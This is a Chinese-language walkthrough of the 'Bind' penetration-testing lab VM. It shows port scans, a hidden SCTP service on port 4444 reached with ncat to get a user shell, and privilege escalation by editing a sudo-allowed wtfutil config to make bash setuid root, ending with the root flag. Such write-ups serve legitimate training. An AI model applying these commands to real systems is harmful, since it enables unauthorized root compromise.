# 靶场搭建
下载:Bind
Nat,IP: 192.168.1.154
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) | |
80/tcp open http Apache httpd 2.4.57 ((Debian)) | |
|_http-server-header: Apache/2.4.57 (Debian) | |
|_http-title: Apache2 Debian Default Page: It works | |
8080/tcp open http Apache httpd 2.4.57 ((Debian)) | |
|_http-server-header: Apache/2.4.57 (Debian) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-open-proxy: Proxy might be redirecting requests |
80 和 8080 没有什么东西,stream 这些应该是提示,扫不出来东西
stream transmission 是 SCTP,所以用 -sY 扫描
┌──(root㉿kali)-[~] | |
└─# nmap -p- -sY -A 192.168.1.154 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 07:46 EDT | |
Nmap scan report for 192.168.1.154 | |
Host is up (0.00049s latency). | |
Not shown: 65534 closed sctp ports (abort) | |
PORT STATE SERVICE VERSION | |
4444/sctp open tcpwrapped | |
MAC Address: 00:0C:29:76:4C:03 (VMware) | |
Too many fingerprints match this host to give specific OS details | |
Network Distance: 1 hop |
用 Ncat 去连接 sctp,拿到了 ariel 的 shell
┌──(root㉿kali)-[~] | |
└─# ncat 192.168.1.154 4444 --sctp | |
id | |
uid=1000(ariel) gid=1000(ariel) grupos=1000(ariel) |
# 提权
sudo -l 发现了 wtfutil 程序可以进行 sudo
首次执行后会生成配置文件: ~/.config/wtf/config.yaml
将 92,93 行的 uptime 命令替换成修改 bash 的命令
91 uptime: | |
92 args: ["4755","/usr/bin/bash"] | |
93 cmd: "chmod" | |
94 enabled: true |
运行:
ariel@bind:~/.config/wtf$ sudo -u root /usr/bin/wtfutil --config=config.yml | |
ariel@bind:~$ /usr/bin/bash -p | |
bash-5.2# cat /root/root.txt | |
13d5ccd7048766f1e90a08154143939a |
最后拿到了 root 权限
